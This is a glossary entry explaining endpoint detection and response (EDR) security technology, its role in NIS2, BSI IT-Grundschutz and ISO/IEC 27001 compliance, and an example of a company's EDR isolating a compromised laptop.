Endpoint detection and response
Endpoint detection and response (EDR) is a security technology that continuously records activity on endpoints such as laptops and servers, detects threats, and enables automated or manual responses.
Endpoint detection and response (EDR) refers to a class of security solutions that continuously monitor the behaviour of endpoints – such as notebooks, workstations, servers, and mobile devices – record security-relevant events, and respond to detected threats. Unlike traditional signature-based antivirus software, EDR relies on behavioural analysis, telemetry data, and correlation in order to detect unknown attacks, fileless malware, and so-called living-off-the-land techniques. An EDR agent installed on the endpoint continuously collects data on processes, network connections, registry changes, and file operations and sends it to a central analysis platform.
The value of EDR lies in combining detection with response. When the system identifies suspicious activity, it can automatically initiate countermeasures, for example isolating an endpoint from the network, terminating malicious processes, or quarantining compromised files. At the same time, EDR provides security teams with forensic data that allows them to trace the course of an attack (threat hunting) and determine the root cause of an incident. EDR is therefore a central building block of modern detection and response capabilities and is often combined with network detection or a SIEM into an overarching XDR strategy.
From a compliance perspective, EDR contributes significantly to meeting regulatory requirements for the detection of and response to security incidents. The NIS2 Directive and German IT security law require affected entities to implement appropriate technical measures for handling security incidents and to report significant incidents promptly. The BSI IT-Grundschutz framework and ISO/IEC 27001 likewise require procedures for detection, logging, and response. EDR provides the technical foundation needed to notice incidents in time at all, to meet statutory reporting deadlines, and to demonstrate the effectiveness of security measures to auditors.
Legal Basis
Art. 21(2)(b) NIS2 Directive (EU) 2022/2555; BSI IT-Grundschutz module DER.1 (Detection of security-relevant events); ISO/IEC 27001 Annex A 8.16 (Monitoring activities)
Practical Example
A mid-sized mechanical engineering company qualifies as an important entity under the NIS2 Directive. The information security officer rolls out an EDR solution across all workstations and servers. When an employee opens a crafted email attachment, the EDR agent detects suspicious PowerShell behaviour, automatically isolates the affected notebook from the network, and alerts the security team. Using the recorded telemetry, the team reconstructs the attack path within a few hours, confirms that no data was exfiltrated, and documents the incident together with the response in time for the notification to the competent authority.